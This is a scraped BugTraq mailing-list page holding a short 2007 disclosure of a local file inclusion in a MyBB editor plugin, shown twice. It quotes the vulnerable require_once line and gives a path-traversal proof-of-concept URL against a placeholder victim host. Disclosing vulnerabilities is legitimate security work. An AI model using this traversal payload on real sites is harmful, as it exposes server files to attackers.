BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Mybb Hot Editor Plugin Local File Inclusion
Apr 09 2007 01:40PM
liz0 expw0rm com
<?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0 (at) expw0rm (dot) com [email concealed]
---------------------------------------
Vul. Code : keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/
http://victim.com/[path]/richedit/keyboard.php?first=../../../../.....
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0 (at) expw0rm (dot) com [email concealed]
---------------------------------------
Vul. Code : keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/
http://victim.com/[path]/richedit/keyboard.php?first=../../../../.....
[ more ]